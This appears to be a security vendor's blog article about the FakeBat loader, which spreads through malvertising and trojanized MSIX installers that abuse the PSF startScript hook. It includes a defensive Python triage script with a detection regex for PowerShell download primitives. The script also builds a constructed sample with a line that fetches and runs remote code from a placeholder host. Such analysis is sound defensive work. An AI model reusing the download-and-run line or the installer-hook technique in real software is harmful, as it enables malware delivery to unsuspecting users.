
FakeBat Loader Fuels Increase in Cyber Attacks

Cybersecurity researchers have recently observed a spike in malware infections attributed to malvertising campaigns. These attacks deploy a malicious loader known as FakeBat, which has become increasingly prevalent.


“The nature of these attacks is opportunistic, focusing on users searching for popular business software,” the Mandiant Managed Defense team explained in a recent technical report. “They target individuals who are specifically seeking certain types of software.” The infection chain starts with a trojanized MSIX installer downloaded from a lookalike site; when the victim launches it, the package runs a PowerShell script that fetches the next-stage malware.

FakeBat, also referred to as EugenLoader or PaykLoader, has been linked to a threat actor known as Eugenfest. The loader is sold as Malware-as-a-Service (MaaS): Google-owned Mandiant tracks the malware itself under the codename NUMOZYLOD and attributes the MaaS operation to the group it calls UNC4536.

Software Searches Lead to FakeBat Malware Infections

How the Attack Works

The attack relies on drive-by download tactics, where unsuspecting users are directed through search-engine ads to fake websites that closely resemble legitimate software download pages. These sites host trojanized MSIX installers that drop FakeBat, and FakeBat in turn fetches whatever payload its customer has paid for. Payloads observed being delivered by FakeBat include IcedID, RedLine Stealer, Lumma Stealer, SectopRAT (also called ArechClient2), and Carbanak, a backdoor linked to the FIN7 cybercrime group.

“UNC4536, the group behind these operations, uses malvertising to push MSIX installers disguised as popular software like Brave, KeePass, Notion, Steam, and Zoom,” Mandiant reported. “These malicious installers are hosted on lookalike websites designed to trick users into downloading them.”

The distinguishing feature of this attack is the use of MSIX installers camouflaged as well-known software. MSIX packages built with Microsoft’s Package Support Framework (PSF) can run a script before the primary application launches, via a configuration entry called startScript; the attackers use that hook to execute the PowerShell downloader while the user sees the expected application start.
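The startScript hook lives in a PSF config.json at the package root, next to AppxManifest.xml, and a PSF-wrapped package points its manifest entry point at PsfLauncher rather than the real executable. An MSIX is an OPC zip, so a triage script can open it without installing anything. The following is an added example of such a check, not code from Mandiant or from the page; the PSF layout (config.json, startScript/endScript with scriptPath, PsfLauncher as the manifest Executable) follows Microsoft’s published PSF format, while the sample package, its script and the placeholder URL are constructed here and are not real FakeBat artifacts.

```python
import io
import json
import re
import zipfile
import xml.etree.ElementTree as ET

# Indicators for a pre-launch script that fetches or decodes-and-runs remote
# content. Heuristic list, chosen for this example; extend for your environment.
SUSPICIOUS_PS = re.compile(
    r"(Invoke-WebRequest|\biwr\b|Invoke-RestMethod|DownloadString|DownloadFile|"
    r"Invoke-Expression|\biex\b|FromBase64String|Start-BitsTransfer|\bcurl\b)",
    re.IGNORECASE,
)


def inspect_msix(data: bytes) -> dict:
    """Return PSF script-hook findings for an MSIX/Appx package given as bytes."""
    findings = {"psf_launcher": False, "script_hooks": [], "suspicious": []}
    with zipfile.ZipFile(io.BytesIO(data)) as pkg:
        names = set(pkg.namelist())

        # 1. Does the manifest hand control to PsfLauncher instead of the app?
        if "AppxManifest.xml" in names:
            root = ET.fromstring(pkg.read("AppxManifest.xml"))
            for el in root.iter():
                if el.tag.endswith("}Application") or el.tag == "Application":
                    if el.get("Executable", "").lower().startswith("psflauncher"):
                        findings["psf_launcher"] = True

        # 2. Which scripts does PSF run around the real application?
        if "config.json" in names:
            cfg = json.loads(pkg.read("config.json"))
            for app in cfg.get("applications", []):
                for hook in ("startScript", "endScript"):
                    script = app.get(hook)
                    if not script:
                        continue
                    path = script.get("scriptPath", "")
                    findings["script_hooks"].append({
                        "application": app.get("id"),
                        "hook": hook,
                        "scriptPath": path,
                        "arguments": script.get("scriptArguments", ""),
                    })
                    # 3. Read the referenced script and look for download/exec primitives.
                    if path in names:
                        body = pkg.read(path).decode("utf-8", errors="replace")
                        hits = sorted({m.group(0) for m in SUSPICIOUS_PS.finditer(body)})
                        if hits:
                            findings["suspicious"].append({"scriptPath": path, "indicators": hits})
    return findings


def build_sample_package() -> bytes:
    """Constructed sample: a minimal PSF-wrapped package (not a real FakeBat file)."""
    manifest = (
        '<?xml version="1.0" encoding="utf-8"?>'
        '<Package xmlns="http://schemas.microsoft.com/appx/manifest/foundation/windows10">'
        '<Identity Name="Example.App" Publisher="CN=Example" Version="1.0.0.0" />'
        '<Applications><Application Id="App" Executable="PsfLauncher64.exe" '
        'EntryPoint="Windows.FullTrustApplication" /></Applications></Package>'
    )
    config = {
        "applications": [{
            "id": "App",
            "executable": "VFS\\ProgramFilesX64\\App\\app.exe",
            "startScript": {
                "scriptPath": "setup.ps1",
                "scriptArguments": "-ExecutionPolicy Bypass",
                "showWindow": False,
                "waitForScriptToFinish": True,
            },
        }]
    }
    script = (
        "# constructed stand-in for a loader's pre-launch script; URL is a placeholder\n"
        "$u = 'https://example.invalid/stage2.ps1'\n"
        "iex (Invoke-WebRequest -UseBasicParsing $u).Content\n"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("AppxManifest.xml", manifest)
        z.writestr("config.json", json.dumps(config))
        z.writestr("setup.ps1", script)
    return buf.getvalue()


if __name__ == "__main__":
    print(json.dumps(inspect_msix(build_sample_package()), indent=2))
```

Run it against a real download with `inspect_msix(open("installer.msix", "rb").read())`. A PsfLauncher entry point plus a startScript is not malicious by itself, since legitimate vendors use PSF to fix up installs, so treat the output as a triage signal: a script hook that reaches out to the network, combined with a package signed by a publisher other than the vendor whose product it imitates, is the pattern described above.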


FakeBat’s Role in Malware Distribution

UNC4536 acts as a malware distributor: FakeBat is its delivery tool, and the payloads it drops belong to its paying customers, including FIN7.

“NUMOZYLOD collects system details like the operating system, domain status, and installed antivirus software,” according to Mandiant. “In some cases, it even gathers the public IPv4 and IPv6 addresses of the infected machine, sends this data to its command-and-control (C2) server, and creates a persistent shortcut in the StartUp folder.”

Similar Attacks

This discovery comes just weeks after Mandiant shed light on the lifecycle of another malware downloader called EMPTYSPACE (also known as BrokerLoader or Vetta Loader). That tool has been used by a financially motivated group tracked as UNC4990 to conduct data theft and cryptojacking attacks, particularly against organizations in Italy.

These developments underscore the growing threat of malvertising and the importance of cybersecurity vigilance in protecting against evolving malware delivery techniques.


About Rhyno Cybersecurity Services

Rhyno Cybersecurity is a Canadian-based company focusing on 24/7 Managed Detection and Response, Penetration Testing, Enterprise Cloud, and Cybersecurity Solutions for small and midsize businesses.

Our products and services are robust, innovative, and cost-effective. Underpinned by our 24x7x365 Security Operations Centre (SOC), our experts ensure you have access to cybersecurity expertise when you need it the most.
